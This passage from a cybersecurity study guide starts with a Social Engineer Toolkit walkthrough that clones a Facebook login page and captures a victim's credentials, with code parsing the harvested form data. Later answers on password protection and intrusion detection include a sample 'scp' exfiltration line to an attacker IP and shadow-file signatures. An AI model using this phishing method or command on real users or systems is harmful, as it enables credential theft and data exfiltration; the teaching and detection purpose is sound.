Step-4 — For site cloning we choose a site that has username and password fields. For this purpose we can select Facebook because of its popularity; its cloned login page is what the victim is moved to when following the link to the "new" website. Now it is time to send our link, which points at our IP address, to the victim. Let us see what the victim sees on opening the link, as shown in fig. 2.4.

    The site https://login.facebook.com/login.php has
    moved, click here to go to the new location.

Fig. 2.4 Site Cloning


| 
Step-5 — As we can see, a message appears informing the user that the website has moved to a new location. The link in the message looks valid, so unsuspicious users will click on it. At that moment a new page loads in the victim's browser; it is the fake page, served from the cloned site running on the attacker's machine, as shown in fig. 2.5.

    facebook
    Facebook helps you connect and share with the people in your life.

    Facebook Login
      Email address : [                ]
      Password      : [                ]
      [ ] Keep me logged in
      or Sign up for Facebook
      Forgotten your password?

Fig. 2.5 Fake Facebook Page


Step-6 — If the victim enters his credentials into the Facebook page that looks like the real one, the attacker is able to capture his username and password, as shown in fig. 2.6.

    [*] Web Jacking Attack Vector is Enabled...Victim needs to click the link
    [*] Social Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:
    172.16.56.128 - - [23/Mar/2012 14:42:17] "GET / HTTP/1.1" 200 -
    Blackbox.home - - [23/Mar/2012 14:46:01] "GET / HTTP/1.1" 200 -
    Blackbox.home - - [23/Mar/2012 14:46:06] "GET /index2.html HTTP/1.1" 200 -
    [*] WE GOT A HIT! Printing the output:
    PARAM: post_form_id=bedf6447a24eea6465074ce20cedc88f
    (further PARAM lines of the submitted form omitted)
    PARAM: lgnjs=1332513966
    POSSIBLE USERNAME FIELD FOUND: email=test@pentestlab.wordpress.com
    POSSIBLE PASSWORD FIELD FOUND: pass=letmein
    PARAM: default_persistent=0
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

Fig. 2.6 Capturing the Credentials
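What the credential harvester prints in fig. 2.6 is the result of two simple pieces of processing: parsing the URL-encoded POST body, and guessing from the field names which parameters are the username and the password. The Python below is an added example written for this page, not SET's own code; it re-creates that processing on a constructed POST body and on constructed access-log lines shaped like those in the figure, and also picks out the hosts that fetched the "site has moved" page and then followed its link (in fig. 2.6 the victim's second request is for /index2.html, the cloned page). The field-name hints are an assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed POST body shaped like the parameters in fig. 2.6 (not a real capture).
SAMPLE_POST = (
    "post_form_id=bedf6447a24eea6465074ce20cedc88f&lgnjs=1332513966"
    "&email=test%40pentestlab.wordpress.com&pass=letmein&default_persistent=0"
)

# Constructed access-log lines in the harvester's format.
SAMPLE_LOG = """\
172.16.56.128 - - [23/Mar/2012 14:42:17] "GET / HTTP/1.1" 200 -
Blackbox.home - - [23/Mar/2012 14:46:01] "GET / HTTP/1.1" 200 -
Blackbox.home - - [23/Mar/2012 14:46:06] "GET /index2.html HTTP/1.1" 200 -
"""

# Assumed field-name hints; the harvester uses a similar name-based guess.
USERNAME_HINTS = ("user", "login", "email", "uid", "account")
PASSWORD_HINTS = ("pass", "pwd", "secret", "pin")


def classify_field(name: str) -> str:
    """Guess a form field's role from its name alone."""
    n = name.lower()
    if any(h in n for h in PASSWORD_HINTS):
        return "password"
    if any(h in n for h in USERNAME_HINTS):
        return "username"
    return "param"


def harvest(body: str) -> dict:
    """Parse a URL-encoded POST body and group its fields by guessed role."""
    out = {"username": [], "password": [], "param": []}
    for name, value in parse_qsl(body, keep_blank_values=True):
        out[classify_field(name)].append((name, value))
    return out


def report_lines(body: str) -> list:
    """Render the fields the way the harvester prints them."""
    lines = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        kind = classify_field(name)
        if kind == "param":
            lines.append(f"PARAM: {name}={value}")
        else:
            lines.append(f"POSSIBLE {kind.upper()} FIELD FOUND: {name}={value}")
    return lines


LOG_RE = re.compile(r'^(\S+) - - \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d+)')


def clicked_through(log_text: str, landing: str = "/", target: str = "/index2.html") -> list:
    """Hosts that fetched the 'moved' page and then followed its link to the clone."""
    seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            host, _, path, _ = m.groups()
            seen.setdefault(host, set()).add(path)
    return sorted(h for h, paths in seen.items() if {landing, target} <= paths)


if __name__ == "__main__":
    print("\n".join(report_lines(SAMPLE_POST)))
    print("clicked through:", clicked_through(SAMPLE_LOG))
```

The same parsing is what a defender does in reverse when reviewing a proxy or web-server log for POSTs to an unexpected host: any request carrying a field the heuristic labels "password" to a domain that is not the real login server is worth an alert.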



Q.3. Write a short note on online frauds.

Ans. Online fraud involves a few major types of crime such as website spoofing, fake e-mail security alerts, etc. In website spoofing and e-mail security threats, authentic-looking websites are created that make the user enter personal details, which are then used by the attacker to access business and bank accounts. This type of online fraud is common in the banking and financial sector. A number of fraudulent e-mails are sent that usually carry a link to a spoofed website; in these e-mails users are asked to enter their user ID and password on the spoofed site, where the attackers retain this information. So we should not provide sensitive information like bank account details on such sites even if the page seems legitimate.

It is possible that the warnings in virus hoax e-mails are genuine, so there is always confusion about whether to take them lightly or seriously. A good practice is to first visit an antivirus vendor's site, such as McAfee's, before taking any action.

Sometimes users get messages by e-mail or letter saying that they have won a lottery. To claim the lottery amount, personal information such as name, address, bank account number, mobile number, etc. is asked from the user, supposedly so that the money can be transferred directly to the customer's account. The banking details are then used for other frauds and scams.


Q.4. Write a short note on software piracy.
Or
What do you mean by software piracy ? (R.G.P.V., Nov. 2019)

Ans. The illegal copying, distribution or use of software is known as software piracy. Since it is such a profitable business, it has caught the attention of organized crime groups in a number of countries. The act of stealing software that is legally protected is also known as software piracy. It was shocking that in 2006, 35% of the software in use all over the world was illegal, amounting to about $40 billion of losses due to software piracy.

When we purchase a commercial software package, an end user license agreement (EULA) is included to protect that software program from copyright infringement. In the terms and conditions of the license it is stated that we can install the original copy of the software bought on one computer and that we can make a backup copy in case the original is lost or damaged.

Software piracy mainly applies to full-function commercial software. Function-restricted or time-limited versions of commercial software are not pirated because they are freely available. Similarly, software that is freely available at no charge, called "freeware", is also not pirated.


Q.5. Explain the types of software piracy. Also discuss the dangers of software piracy. (R.G.P.V., Nov. 2018)

Ans. The variety of pirating techniques explains how individuals pirate software according to their needs. The types of software piracy are as follows —

(i) Softlifting — This is the most common type of software piracy. It is the variety of software piracy in which someone purchases one version of the software and installs it onto multiple computers, although according to the software license terms it should be installed only once. This type of software piracy often occurs in school or business environments, and usually the motive is to save money.

(ii) Client-server Overuse — When many people on a network use one main copy of the program at the same time, it is called client-server overuse. This often occurs when businesses are on a local area network and install the software for all employees to use. This becomes software piracy if the license does not entitle the organisation to use it multiple times.

(iii) Hard Disk Loading — In this type someone buys a legal version of the software, copies or installs it onto the hard disks of computers, and sells those computers with the software pre-installed.

(iv) Counterfeiting — When computer programs are illegally duplicated and sold with the appearance of authenticity, counterfeiting occurs. Counterfeit software is sold at low prices in comparison with legitimate software.

(v) Online Piracy — When illegal software is sold, shared or acquired by means of the Internet, it is called online piracy or Internet piracy. This is usually done through peer-to-peer (P2P) file sharing systems, and is also found in the form of online auction sites and blogs.

The dangers of software piracy are as follows —

(i) There are many chances that the software will malfunction or fail.

(ii) Forfeited access to support for the program, such as training, upgrades, customer support, etc.

(iii) No warranty, and the software cannot be updated.

(iv) Increased risk of infecting the PC with malware, viruses or spyware.

(v) The PC can slow down.

(vi) Legal action due to copyright infringement.


Q.6. What is intrusion ? 


Ans. An intrusion is a deliberate unauthorized attempt, successful or not, to break into, access, manipulate, or misuse some valuable property, where the misuse may result in rendering the property unreliable or unusable. The person who intrudes is an intruder.
Q.7. What is an intruder ? Explain three classes of intruders. (R.G.P.V., Dec. 2017)
Or
Explain the 3 classes of intruder. (R.G.P.V., Dec. 2006, 2012)
Or
What is an intruder ? Describe its classification. (R.G.P.V., Dec. 2015)

Ans. One of the two most popular threats to security is the intruder (the other is viruses), generally referred to as a hacker or cracker. An individual who gains, or attempts to gain, unauthorized access to a computer system, or who gains unauthorized privileges on that system, is known as an intruder. There are three classes of intruders —

(i) Masquerader — An individual who is not authorized to use the computer and who penetrates a system's access controls to exploit a legitimate user's account.

(ii) Misfeasor — A legitimate user who accesses data, programs or resources for which such access is not authorized, or who is authorized for such access but misuses his or her privileges.

(iii) Clandestine User — An individual who seizes supervisory control of the system and uses this control to evade auditing and access controls or to suppress audit collection.


Q.8. List and briefly define three classes of intruders. What are two 
common techniques used to protect a password file ? 
(R.GP.V., June 2005, Dec. 2011) 


Ans. Three Classes of Intruders — Refer to Q.7. 


Techniques Used to Protect a Password File — One way to thwart a password attack is to deny the opponent access to the password file. If the encrypted (hashed) password portion of the file is accessible only by a privileged user, then the opponent cannot read it without already knowing the password of a privileged user. This approach has several drawbacks, however. A more effective strategy is to force users to select passwords that are difficult to guess.
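Both protections named above can be demonstrated in a few lines. The Python below is an added example for this page, not from the book: a proactive checker that rejects guessable passwords (including dictionary words disguised with digit and symbol substitutions), salted PBKDF2 hashing for the stored form, and a check that the password file is not readable by group or others. The word list and the substitution table are small illustrative assumptions, and the demo writes its own throw-away files.

```python
import hashlib
import hmac
import os
import stat
import tempfile

# Constructed stand-in for a list of common passwords (assumption).
COMMON = {"password", "letmein", "123456", "qwerty", "welcome", "admin", "iloveyou"}

# Undo the usual "leet" substitutions: @->a 0->o 1->l 3->e 4->a $->s 5->s !->i
UNLEET = str.maketrans("@0134$5!", "aoleassi")


def password_problems(pw: str, dictionary=COMMON, min_len: int = 12) -> list:
    """Proactive checker: reasons why a proposed password is easy to guess."""
    problems = []
    if len(pw) < min_len:
        problems.append(f"shorter than {min_len} characters")
    classes = [any(c.islower() for c in pw), any(c.isupper() for c in pw),
               any(c.isdigit() for c in pw), any(not c.isalnum() for c in pw)]
    if sum(classes) < 3:
        problems.append("uses fewer than three character classes")
    # strip the trailing digits/symbols people append, then undo substitutions
    core = pw.lower().rstrip("0123456789!@#$%^&*").translate(UNLEET)
    if core in dictionary:
        problems.append("dictionary word with trivial substitutions")
    if len(set(pw)) <= 2:
        problems.append("too repetitive")
    return problems


def hash_password(pw: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Salted PBKDF2-HMAC-SHA256; the stored string carries its own parameters."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(pw: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def password_file_exposed(path: str) -> bool:
    """True if group or others can read the file; a shadow file should be 0600 or 0640."""
    return bool(os.stat(path).st_mode & (stat.S_IRGRP | stat.S_IROTH))


def demo_file_modes() -> tuple:
    """Create two temporary 'shadow' files with different modes and check them."""
    with tempfile.TemporaryDirectory() as d:
        tight, loose = os.path.join(d, "shadow-0600"), os.path.join(d, "shadow-0644")
        for path, mode in ((tight, 0o600), (loose, 0o644)):
            with open(path, "w") as f:
                f.write("root:" + hash_password("constructed") + ":19000:0:99999:7:::\n")
            os.chmod(path, mode)
        return password_file_exposed(tight), password_file_exposed(loose)


if __name__ == "__main__":
    print(password_problems("P@ssw0rd1!"))
    print(demo_file_modes())
```

The two halves are complementary: the checker keeps weak passwords out of the file, and the hashing with a per-user salt and a slow function ensures that even an opponent who does obtain the file must pay the full guessing cost per account.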


Q.9. What is an intrusion detection system (IDS) ? 
Or 
Discuss the concept of intrusion detection system. (R.GP.V., Nov. 2019) 


Ans. An intrusion detection system (IDS) is a system used to detect 
unauthorized intrusions into computer systems and networks. Intrusion 
detection as a technology is not new, it has been used for generations to 
defend valuable resources. Kings, emperors, and nobles who had wealth used 
it in rather an interesting way. They built castles and palaces on tops of 
mountains and sharp cliffs with observation towers to provide them with a 
clear overview of the lands below, where they could detect an intrusion ahead of time to defend themselves.


Over the years, intrusion detection has been used by individuals and companies in a number of ways, including erecting walls and fences around valuable resources with sentry boxes to watch the activities surrounding the premises of the resource. Individuals have used dogs, flood lights, fences, closed circuit television and other watchful gadgets to be able to detect intrusions.

As technology has developed, a new industry based on intrusion detection has sprung up. Security firms are cropping up everywhere to offer individual and property security, to be a watchful eye so that the property owner can sleep or take a vacation in peace. These new systems have been made to configure changes, compare user actions against known attack scenarios, and be able to predict changes in activities that indicate and can lead to suspicious activities.


Q.10. Discuss the best approaches to implementing an effective IDS.

Or
Explain statistical anomaly and rule-based detection technique of intrusion detection. (R.G.P.V., Dec. 2017)

Or
Clearly differentiate between anomaly detection and signature detection techniques of IDS. (R.G.P.V., June 2017)

Ans. The following approaches are used to implement an IDS —


(i) Anomaly Detection — Anomaly based systems are learning 
systems in a sense that they work by continuously creating norms of activities, 
These norms are then later used to detect anomalies that might indicate an 
intrusion. Anomaly detection compares observed activity against expected 
normal usage profiles learned. The profiles may be developed for users, groups 
of users, applications, or system resource usage. 


In anomaly detection, it is assumed that all intrusive activities are 
necessarily anomalous. It happens in real life too, where most bad activities 
are anomalous and we can, therefore, be able to character profile the bad 
elements in society. The anomaly detection concept, therefore, will create, for 
every guarded system, a corresponding database of normal profiles. Any activity 
on the system is checked against these profiles and is deemed acceptable or 
not based on the presence of such activity in the profile database. 


Areas of interest are threshold monitoring, user work profiling, group 
Work profiling, resource profiling, executable profiling, static work profiling, 
adaptive work profiling, and adaptive rule base profiling. 

Anomalous behaviours are detected when the identification engine takes observed activities and compares them to the rule-base profiles for significant deviations. The profiles are commonly for individual users, groups of users, system resource usages, and a collection of others as discussed below —

(a) Individual Profile — This is a collection of common activities a user is expected to do, with little deviation from the expected norm. This may cover specific user events like usage time being longer than usual, recent changes in user work patterns, and significant or irregular user requests.

(b) Group Profile — This profile covers a group of users with a common work pattern, resource requests and usage, and historic activities. It is expected that each individual user in the group follows the group activity patterns.

(c) Resource Profile — This includes the monitoring of the use patterns of the system resources like applications, accounts, storage media, protocols, communications ports, and a list of many others the system manager may wish to include. It is expected, depending on the rule-based profile, that common uses will not deviate significantly from these rules.

(d) Other Profiles — These include executable profiles that 
monitor how executable programs use the system resources. This, for example, 
may be used to monitor strange deviations of an executable program if it has an 
embedded Trojan worm or a trapdoor virus. In addition to executable profiles, 
there are also the following profiles — work profile which includes monitoring 
the ports, static profile whose job is to monitor other profiles periodically updating 
them so that those profiles, cannot slowly expand to sneak in intruder behaviour, 
and a variation of the work profile called the adaptive profile which monitors 
work profiles, automatically updating them to reflect recent upsurges in usage. 
Finally there is also the adaptive rule base profile which monitors historic usage 

, patterns of all other profiles and uses them to make updates to the rule-base. 
Beside being embarrassing and time consuming, the concept also has 

other problems. If we consider that the set of intrusive activities only intersects 
the set of anomalous activities instead of being exactly the same, then two 
problems arise — 

(a) Anomalous activities that are not intrusive are classified as 
intrusive. 

(b) Intrusive activities that are not anomalous result in false 
negatives, that is, events are not flagged intrusive, though they actually are. 

Anomaly detection systems are also computationally expensive because of the overhead of keeping track of, and possibly updating, several system profile metrics.


(ii) Misuse Detection — The misuse detection concept assumes that each intrusive activity is representable by a unique pattern or signature, so that slight variations of the same activity produce a new signature and therefore can also be detected. Misuse detection systems are therefore commonly known as signature systems. They work by looking for a specific signature on a system. Identification engines perform well by monitoring these patterns of known misuse of system resources. These patterns, once observed, are compared to those in the rule-base that describe bad or undesirable usage of resources. To accomplish this, a knowledge database and a rule engine must be developed to work together. Misuse pattern analysis is best done by expert systems, model-based reasoning, or neural networks.

The major problems that arise out of this concept are as follows —

(a) The system cannot detect unknown attacks with unmapped and un-archived signatures.

(b) The system cannot predict new attacks and will, therefore, be responding after an attack has occurred. This means that the system will never detect a new attack.
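The two approaches can be set side by side in code. The Python below is an added example for this page, not from the book: a tiny anomaly engine that learns a per-user profile (usual login hours, mean and standard deviation of data transferred) from a constructed history and flags deviations, and a tiny misuse engine that matches known attack signatures against the same events. The history, the events and the signature set are all constructed for illustration. Each engine catches what the other misses: the mass transfer at 3 a.m. matches no signature, while the injection string travels in a session of perfectly normal size.

```python
import re
import statistics

# Constructed history: per-user (login hour, megabytes transferred) for 7 sessions.
BASELINE = {
    "alice": [(9, 120), (10, 95), (9, 130), (11, 110), (10, 100), (9, 125), (10, 115)],
    "bob":   [(14, 20), (15, 25), (13, 18), (14, 22), (16, 30), (15, 24), (14, 21)],
}


def build_profile(sessions: list) -> dict:
    """Learn the norm for one user from past sessions."""
    mbs = [mb for _, mb in sessions]
    return {
        "hours": {h for h, _ in sessions},
        "mean": statistics.mean(mbs),
        "std": statistics.pstdev(mbs) or 1.0,   # avoid division by zero on a flat history
    }


PROFILES = {user: build_profile(s) for user, s in BASELINE.items()}


def anomaly_check(user: str, hour: int, mb: float, z_threshold=3.0, hour_slack=2) -> list:
    """Anomaly detection: deviations from the learned profile, as a list of reasons."""
    p = PROFILES[user]
    reasons = []
    z = (mb - p["mean"]) / p["std"]
    if abs(z) > z_threshold:
        reasons.append(f"volume z={z:.1f}")
    if all(abs(hour - h) > hour_slack for h in p["hours"]):
        reasons.append(f"unusual hour {hour}")
    return reasons


# Constructed signature set for the misuse engine.
SIGNATURES = {
    "shadow-read":   re.compile(r"\b(cat|cp|less|more)\s+/etc/shadow\b"),
    "sql-injection": re.compile(r"'\s*or\s+'?1'?\s*=\s*'?1", re.IGNORECASE),
    "dir-traversal": re.compile(r"(\.\./){2,}"),
}


def signature_check(line: str) -> list:
    """Misuse detection: names of the known patterns present in the line."""
    return [name for name, rx in SIGNATURES.items() if rx.search(line)]


# Constructed events: (user, hour, megabytes, request or command seen)
EVENTS = [
    ("alice", 10, 110,  "GET /index.html"),
    ("alice", 3,  4100, "scp /srv/db/dump.sql.gz attacker@203.0.113.9:"),  # no known signature
    ("bob",   14, 22,   "GET /search?q=' OR '1'='1"),                       # normal volume
    ("bob",   15, 23,   "cat /etc/shadow"),
]


def run(events=EVENTS) -> list:
    """Return (user, anomaly reasons, matched signatures) for each event."""
    return [(u, anomaly_check(u, h, mb), signature_check(line)) for u, h, mb, line in events]


if __name__ == "__main__":
    for user, anomalies, sigs in run():
        print(f"{user:6} anomaly={anomalies or '-'} signature={sigs or '-'}")
```

The z-score threshold and the hour slack are the tunable "rule-base" of the anomaly engine; lowering them catches more, at the price of the false alarms discussed under the base-rate fallacy in Q.11.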


Q.11. Explain the following terms - Masquerader, Misfeasor, Clandestine user and Base-rate fallacy. Explain statistical anomaly detection method for intrusion detection. (R.G.P.V., June 2019)

Ans. Masquerader, Misfeasor and Clandestine User — Refer to Q.7.

Base-rate Fallacy — To be of practical use, an intrusion detection system should detect a substantial percentage of intrusions while keeping the false alarm rate at an acceptable level. If only a modest percentage of actual intrusions are detected, the system provides a false sense of security. On the other hand, if the system frequently triggers an alert when there is no intrusion (a false alarm), then either system managers will begin to ignore the alarms, or much time will be wasted analyzing the false alarms.

Unfortunately, because of the nature of the probabilities involved, it is very difficult to meet the standard of a high rate of detection with a low rate of false alarms. In general, if the actual number of intrusions is low compared to the number of legitimate users of a system, then the false alarm rate will be high unless the test is extremely discriminating: even a small per-event false alarm probability, multiplied by the very large number of legitimate events, yields more false alarms than true ones. A study of existing intrusion detection systems indicated that current systems have not overcome the problem of the base-rate fallacy.

Anomaly Detection Method — Refer to Q.10 (i).
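The base-rate problem can be put in numbers. The Python below is an added example for this page, not from the book; the figures it uses (one intrusion per 10,000 audited events, 99% detection, 1% false alarms, a million events a day) are assumptions chosen to show the effect, and the third function turns the question round and asks how small the false alarm rate would have to be for half of all alarms to be real.

```python
def p_intrusion_given_alarm(base_rate: float, detection_rate: float, false_alarm_rate: float) -> float:
    """Bayes' rule: the fraction of alarms that correspond to real intrusions.
    base_rate        P(intrusion) per audited event
    detection_rate   P(alarm | intrusion)
    false_alarm_rate P(alarm | no intrusion)"""
    true_alarms = base_rate * detection_rate
    false_alarms = (1.0 - base_rate) * false_alarm_rate
    return true_alarms / (true_alarms + false_alarms)


def required_false_alarm_rate(base_rate: float, detection_rate: float, target_precision: float) -> float:
    """Solve b*d / (b*d + (1-b)*f) = t for f: the per-event false alarm rate
    needed so that a fraction t of all alarms are real."""
    return base_rate * detection_rate * (1.0 - target_precision) / (target_precision * (1.0 - base_rate))


def daily_alarms(events_per_day: float, base_rate: float, detection_rate: float,
                 false_alarm_rate: float) -> dict:
    """Expected true and false alarms per day, i.e. the analysts' workload."""
    intrusions = events_per_day * base_rate
    return {
        "true": intrusions * detection_rate,
        "false": (events_per_day - intrusions) * false_alarm_rate,
    }


if __name__ == "__main__":
    b, d, f = 1e-4, 0.99, 0.01          # assumed figures
    print(f"P(intrusion | alarm) = {p_intrusion_given_alarm(b, d, f):.4f}")
    print(f"false alarm rate needed for 50% precision: {required_false_alarm_rate(b, d, 0.5):.2e}")
    print(daily_alarms(1_000_000, b, d, f))
```

With these inputs fewer than 1% of alarms are genuine (about 99 true against roughly 10,000 false per day), and the per-event false alarm rate would have to drop to about 1 in 10,000 before half the alarms were worth an analyst's time.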


Q.12. Describe various types of intrusion detection systems. 
(R.GP.V., Dec. 2016) 
Or 
Give different types of intrusion detection systems. (R.GP.V., June 2016) 


Ans. Intrusion detection systems can be classified based on their monitoring scope, that is, those that monitor only a small area and those that monitor a wide area. Those that monitor a wide area are called network-based intrusion detection systems and those that have a limited scope are called host-based intrusion detection systems.

(i) Network-based Intrusion Detection Systems (NIDSs) — Network-based intrusion detection systems have the whole network as their monitoring scope. They monitor the traffic on the network to detect intrusions. They are responsible for detecting anomalous, inappropriate, or other data that may be considered unauthorized and harmful occurring on a network. There are several differences between an NIDS and a firewall. A firewall is configured to allow or deny access to a particular service or host based on a set of rules; only when the traffic matches an acceptable pattern is it permitted to proceed, regardless of what the packet contains. An NIDS, by contrast, captures and inspects every packet destined to the network regardless of whether it is permitted or not. If the packet signature, based on the contents of the packet, is not among the acceptable signatures (that is, it matches a known attack pattern), an alert is generated.


There are many ways an NIDS may be run. It can either be run as an 
independent standalone machine where it promiscuously watches over all 
network traffic or it can just monitor itself as the target machine to watch 
over its own traffic. For example in this mode, it can watch itself to see if 
someone is attempting a SYN-flood or a TCP port scan. 


While NIDSs can be very effective in capturing all incoming network 
traffic, it is possible that an attacker can evade this detection by exploiting 
ambiguities in the traffic stream as seen by the NIDS. Mark Handley, Vern 
Paxson, and Christian Kreibich list the sources of these exploitable ambiguities 
as follows — 

(a) Several NIDSs do not have complete analysis capabilities to 
analyze a full range of behaviour that can be exposed by the user and allowed 
by a particular protocol. The attacker can also evade the NIDS even if the 
NIDS does perform analysis for the protocol. 

(b) Since NIDSs are far removed from individual hosts, they 
do not have full knowledge of each host’s protocol implementation. This 
knowledge is necessary for the NIDS to be able to determine how the host 
may treat a given sequence of packets if different implementations interpret 
the same stream of packets in different ways. 

(c) Again, since NIDSs do not have a full picture of the network topology between the NIDS and the hosts, the NIDS may be unable to determine whether a given packet will even be seen by the hosts.

(ii) Host-based Intrusion Detection Systems (HIDS) — Host-based intrusion detection is the technique of detecting malicious activities on a single computer. A host-based intrusion detection system is therefore deployed on a single target computer, and it uses software that monitors operating-system-specific logs, including the system, event and security logs on Windows systems and syslog in Unix environments, to watch for sudden changes in these logs. When a change is detected in any of these files, the HIDS compares the new log entry with its configured attack signatures to see if there is a match. If a match is detected, this signals the presence of an illegitimate activity.


Although HIDSs are deployable on a single computer, they can also be put on a remote host or deployed on a segment of a network to monitor a section of the segment. The data gathered, which can sometimes be overwhelming, is then compared with the rules in the organization's security policy. The main problem with HIDSs is that, given the amount of log data generated, the analysis of such raw data puts significant overhead not only on the processing power needed to analyze the data but also on the security staff needed to review it.

Host sensors can also use user level processes to check key system files 
and executables to periodically calculate their checksum and report changes in 
the checksum. 


Q.13. What do you mean by intrusion ? Explain types of IDS detection 
techniques. (R.GP.K., Dec. 2013) 


Ans. Refer to Q.6 and Q.12. 


Q.14. What is an IDS ? Explain the different types of IDS in brief. 
(R.GP.V., Dec. 2010, June 2011) 
Ans. Refer to Q.9 and Q.12. 


Q.15. Explain the architecture of a distributed intrusion detection 
system. Give the major issues in the design. (R.GP.V., June 2012) 


Ans. Architecture of a Distributed Intrusion Detection System - 
The architecture of a distributed intrusion detection system consists of three 
main components as shown in fig. 2.7. 


(i) Host Agent Module — An audit collection module operates as a 
background process on a monitored system. Its aim is to gather data on security 
related events on the host and send these to the central manager. 


(ii) LAN Monitor Agent Module — It operates in the same manner 
as a host agent module except that it analyzes LAN traffic and sends the 
results to the central manager. 


(iii) Central Manager Module — It gets reports from host agents 
and LAN monitor and processes and correlates these reports to detect intrusion. 


                          +-------------------------+
    Host Agent Module --> |                         | <-- LAN Monitor
                          |  Central Manager Module |     Agent Module
    Host Agent Module --> |                         |
                          +-------------------------+

Fig. 2.7 Architecture for Distributed Intrusion Detection


Major Issues in the Design of a Distributed Intrusion Detection 
System — The following are the major design issues in a distributed intrusion 
detection system — 

(i) The architecture can be either centralized or decentralized. In a centralized architecture there is a single central point of collection and analysis of all audit data. This simplifies the task of correlating incoming reports but creates a potential bottleneck and single point of failure. At the other extreme, a decentralized architecture has more than one analysis center, but these must coordinate their activities and exchange information.

(ii) There is one or more nodes in the network that will serve as 
collection and analysis points for the data from the systems on the network. 
Therefore, either raw audit data or summary data must be sent across the 
network. Hence, there is a need to assure the integrity and confidentiality of 
these data. Integrity is needed to prevent an intruder from masking his or her 
activities by altering the transmitted audit information. Confidentiality is needed 
because the transmitted audit information could be valuable. 

(iii) A distributed intrusion detection system may need to deal with different audit record formats. In a heterogeneous environment, different systems will use different native audit collection systems and, if using intrusion detection, may use different formats for security-related audit records.


Q.16. What are file system indications for a possible intrusion ?

Ans. File system indications of a possible intrusion include new files and directories, missing files, altered file data, md5sum or sha1sum mismatches, new setuid programs, and rapidly growing or overflowing file systems.

New Files and Directories — There can be files with bad digital signatures and multiple new files and directories. File names may be suspicious, like names starting with one or more dots, or legitimate-sounding file names appearing in inappropriate places.

Missing Files — Some types of difficulty are indicated by missing files, particularly log files.

Setuid and Setgid Programs — New setuid and setgid files are the right place to start looking for problems.

Rapidly Changing File System Sizes — Rapidly changing file system sizes may be a sign of a hacker's monitoring program producing large log files.

Updated Public File Archives — Check the contents of your web and FTP areas for updated files.
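Most of the indications listed above, and the checksum reporting by host sensors mentioned under HIDS in Q.12, are what a file-integrity checker of the Tripwire kind reports automatically. The Python below is an added example for this page, not from the book or any product: it records a SHA-256 digest, the permission bits and the size of every regular file under a directory, then diffs a later snapshot against that baseline and classifies new, missing and modified files, new setuid/setgid programs, hidden dot-named paths and files that have grown sharply. The demo builds its own throw-away directory tree, so everything it reports on is constructed.

```python
import hashlib
import os
import stat
import tempfile

SUID_BITS = stat.S_ISUID | stat.S_ISGID


def snapshot(root: str) -> dict:
    """Map relative path -> (sha256, permission bits, size) for every regular file."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):   # skip symlinks, devices, sockets
                continue
            with open(path, "rb") as f:
                digest = hashlib.sha256(f.read()).hexdigest()
            snap[os.path.relpath(path, root)] = (digest, stat.S_IMODE(st.st_mode), st.st_size)
    return snap


def compare(baseline: dict, current: dict) -> list:
    """Classify the differences between two snapshots as (finding, path) pairs."""
    findings = []
    for rel in sorted(set(baseline) | set(current)):
        old, new = baseline.get(rel), current.get(rel)
        hidden = any(part.startswith(".") for part in rel.split(os.sep))
        if old is None:
            findings.append(("new", rel))
            if new[1] & SUID_BITS:
                findings.append(("new-setuid", rel))
            if hidden:
                findings.append(("hidden-path", rel))
        elif new is None:
            findings.append(("missing", rel))
        else:
            if old[0] != new[0]:
                findings.append(("modified", rel))
            if (new[1] & SUID_BITS) and not (old[1] & SUID_BITS):
                findings.append(("setuid-added", rel))
            if new[2] > 4 * max(old[2], 1):    # grew more than fourfold since baseline
                findings.append(("rapid-growth", rel))
    return findings


def demo() -> list:
    """Take a baseline of a toy tree, simulate an intrusion, and diff."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data, mode=0o644):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
            os.chmod(path, mode)

        write("bin/ls", b"original ls", 0o755)
        write("var/log/auth.log", b"ok login\n")
        write("var/log/wtmp", b"x" * 10)
        baseline = snapshot(root)
        # simulated intrusion: trojaned binary, deleted log, hidden dropper, bloated log
        write("bin/ls", b"trojaned ls", 0o755)
        os.remove(os.path.join(root, "var/log/auth.log"))
        write("tmp/.x/dropper", b"payload")
        write("var/log/wtmp", b"x" * 100)
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for finding, path in demo():
        print(f"{finding:13} {path}")
```

The baseline must itself be kept where an intruder cannot rewrite it (read-only media or a remote host), since a checker whose reference database has been altered reports nothing.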

Q.17. Discuss the various intrusion detection tools. (R.G.P.V., June 2012)

Or
Briefly explain available tools of intrusion detection. (R.G.P.V., Dec. 2016)

Ans. Intrusion detection tools work best when used after vulnerability scans have been performed; they then stand watch. Table 2.1 shows various current ID tools.

Table 2.1 Some Current ID Tools

    Tool                      Vendor
    RealSecure v3.0           ISS
    NetProwler 3.1            Axent Technologies
    NetRanger v2.2            Cisco
    Flight Recorder v2.2      NFR Network
    SessionWall-3 v4.0        Computer Associates
    Kane Security Monitor     Security Dynamics

All network-based intrusion detection tools can detect reconnaissance probes in addition to port and host scans. As monitoring tools, they give information on —

(i) Hundreds of thousands of network connections

(ii) External break-in attempts

(iii) Internal scans

(iv) Misuse patterns of confidential data

(v) Unencrypted remote logins or web sessions

(vi) Unusual or potentially troublesome observed network traffic


This information is gathered by these tools monitoring network components and services that include —

(i) Servers for (a) mail, (b) FTP and (c) web activities

(ii) DNS, RADIUS and others

(iii) TCP/IP ports

